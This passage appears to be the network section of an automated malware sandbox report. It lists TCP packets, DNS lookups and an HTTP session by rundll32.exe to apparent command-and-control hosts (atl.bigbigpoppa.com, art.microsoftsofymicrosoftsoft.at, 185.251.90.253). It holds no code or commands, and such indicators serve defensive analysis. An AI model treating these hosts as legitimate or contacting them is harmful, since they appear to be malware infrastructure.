                                                        Sep 10, 2021 09:57:03.199012995 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.246896029 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.246932030 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.246949911 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.246972084 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.246994972 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247023106 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247047901 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247070074 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247092962 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247137070 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247158051 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.247194052 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247220039 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247248888 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247273922 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247297049 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247320890 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247371912 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.247464895 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.247905970 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.247998953 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.248023987 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.248045921 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.248111963 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.296354055 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296397924 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296418905 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296442032 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296463013 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296489954 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296514034 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296535015 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296556950 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296575069 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.296601057 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296622992 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296643019 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296660900 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.296677113 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296701908 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296709061 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.296730995 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296751022 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296771049 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.296789885 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296821117 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296828032 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.296855927 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296883106 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296905994 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.296917915 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296937943 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296962976 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.296968937 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.296991110 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297013044 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297022104 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297043085 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297070026 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297080994 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297105074 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297126055 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297137022 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297158003 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297178030 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297185898 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297213078 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297235966 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297245979 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297267914 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297287941 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297296047 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297323942 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297348022 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297357082 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297379017 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297399998 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297413111 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297431946 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.297465086 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.297518015 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.346594095 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.346687078 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.346817017 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.346839905 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.346884012 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.346914053 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.346942902 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.346976042 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347012043 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347043991 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347079992 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347137928 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347184896 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347203016 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347237110 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347271919 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347281933 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347311020 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347337008 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347349882 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347378969 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347405910 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347419024 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347448111 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347472906 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347507000 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347522020 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347557068 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347583055 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347604990 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347636938 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347662926 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347678900 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347704887 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347733021 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347758055 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347778082 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347807884 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347846985 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347856045 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347892046 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347928047 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347937107 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.347965956 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.347991943 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348018885 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348035097 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.348059893 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348087072 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348114967 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348129988 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.348154068 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348181963 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348195076 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.348222971 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348249912 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348284006 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348304033 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.348334074 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348365068 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348378897 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.348407984 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348434925 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348453045 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.348476887 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348510027 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348517895 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.348546028 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.348582029 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.348700047 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.397670031 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.397727013 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.397754908 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.397793055 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.397829056 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.397876978 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.397907019 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.397958994 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398005009 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398015976 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.398055077 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398098946 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398147106 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.398163080 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398201942 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398245096 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398258924 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.398308039 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398327112 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.398375034 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398413897 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.398442984 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398493052 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398530960 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.398557901 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398602009 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398643017 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.398663998 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398709059 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398749113 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398788929 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.398808956 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398847103 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398869991 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.398916006 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.398956060 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.398987055 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.399034977 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.399079084 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.399106026 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.399172068 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.399224043 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.399285078 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.399341106 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.399385929 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.399410963 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.399461031 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.399509907 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.399532080 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.399584055 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.399619102 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.399652958 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.399703979 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.399754047 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.399787903 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.399821997 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.399869919 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.399892092 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.399947882 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.399980068 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.400023937 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.400079012 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.400114059 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.400156021 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.400214911 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.400237083 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.400295019 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.400346994 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.400367022 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.400418043 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.400466919 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.400484085 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.449502945 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449529886 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449547052 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449563980 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449580908 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449600935 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449615955 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449636936 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449656963 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449681997 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449704885 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449724913 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449752092 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449760914 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.449788094 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449807882 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449826956 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449846983 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449866056 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449889898 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449914932 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.449920893 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.450015068 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.451030016 CEST4978880192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.499962091 CEST8049788185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.753268003 CEST4978980192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.802388906 CEST8049789185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:03.802563906 CEST4978980192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.803296089 CEST4978980192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:03.895859003 CEST8049789185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:04.265120983 CEST8049789185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:04.265170097 CEST8049789185.251.90.253192.168.2.5
                                                        Sep 10, 2021 09:57:04.265221119 CEST4978980192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:04.265330076 CEST4978980192.168.2.5185.251.90.253
                                                        Sep 10, 2021 09:57:04.314174891 CEST8049789185.251.90.253192.168.2.5

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 10, 2021 09:54:16.495672941 CEST6180553192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:54:16.525423050 CEST53618058.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:54:17.735285997 CEST5479553192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:54:17.774296999 CEST53547958.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:54:24.310771942 CEST4955753192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:54:24.364779949 CEST53495578.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:54:37.129802942 CEST6173353192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:54:37.174592018 CEST53617338.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:55:00.952759981 CEST6544753192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:55:00.999222994 CEST53654478.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:55:07.246059895 CEST5244153192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:55:07.283293009 CEST53524418.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:55:36.868942976 CEST6217653192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:55:36.920532942 CEST53621768.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:55:38.634845972 CEST5959653192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:55:38.680517912 CEST53595968.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:56:37.302378893 CEST6529653192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:56:37.372829914 CEST53652968.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:56:38.174312115 CEST6318353192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:56:38.208437920 CEST53631838.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:56:39.009015083 CEST6015153192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:56:39.095431089 CEST53601518.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:56:39.535094023 CEST5696953192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:56:39.569369078 CEST53569698.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:56:40.187892914 CEST5516153192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:56:40.213875055 CEST53551618.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:56:40.685719013 CEST5475753192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:56:40.737162113 CEST53547578.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:56:41.651288986 CEST4999253192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:56:41.679358959 CEST53499928.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:56:42.441236019 CEST6007553192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:56:42.471427917 CEST53600758.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:56:43.250380993 CEST5501653192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:56:43.303951979 CEST53550168.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:56:43.879877090 CEST6434553192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:56:43.915908098 CEST53643458.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:57:00.992954969 CEST5712853192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:57:01.324281931 CEST53571288.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:57:02.308634996 CEST5479153192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:57:02.645363092 CEST53547918.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:57:03.698268890 CEST5046353192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:57:03.735027075 CEST53504638.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:58:07.014339924 CEST5039453192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:58:07.042078018 CEST53503948.8.8.8192.168.2.5
                                                        Sep 10, 2021 09:58:07.188774109 CEST5853053192.168.2.58.8.8.8
                                                        Sep 10, 2021 09:58:07.511419058 CEST53585308.8.8.8192.168.2.5

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Sep 10, 2021 09:57:00.992954969 CEST192.168.2.58.8.8.80x805eStandard query (0)atl.bigbigpoppa.comA (IP address)IN (0x0001)
                                                        Sep 10, 2021 09:57:02.308634996 CEST192.168.2.58.8.8.80xffa7Standard query (0)atl.bigbigpoppa.comA (IP address)IN (0x0001)
                                                        Sep 10, 2021 09:57:03.698268890 CEST192.168.2.58.8.8.80x742dStandard query (0)atl.bigbigpoppa.comA (IP address)IN (0x0001)
                                                        Sep 10, 2021 09:58:07.014339924 CEST192.168.2.58.8.8.80xcc35Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                                        Sep 10, 2021 09:58:07.188774109 CEST192.168.2.58.8.8.80xde2aStandard query (0)art.microsoftsofymicrosoftsoft.atA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Sep 10, 2021 09:57:01.324281931 CEST8.8.8.8192.168.2.50x805eNo error (0)atl.bigbigpoppa.com185.251.90.253A (IP address)IN (0x0001)
                                                        Sep 10, 2021 09:57:02.645363092 CEST8.8.8.8192.168.2.50xffa7No error (0)atl.bigbigpoppa.com185.251.90.253A (IP address)IN (0x0001)
                                                        Sep 10, 2021 09:57:03.735027075 CEST8.8.8.8192.168.2.50x742dNo error (0)atl.bigbigpoppa.com185.251.90.253A (IP address)IN (0x0001)
                                                        Sep 10, 2021 09:58:07.042078018 CEST8.8.8.8192.168.2.50xcc35No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                                        Sep 10, 2021 09:58:07.511419058 CEST8.8.8.8192.168.2.50xde2aNo error (0)art.microsoftsofymicrosoftsoft.at185.251.90.253A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • atl.bigbigpoppa.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.549787185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                                        TimestampkBytes transferredDirectionData
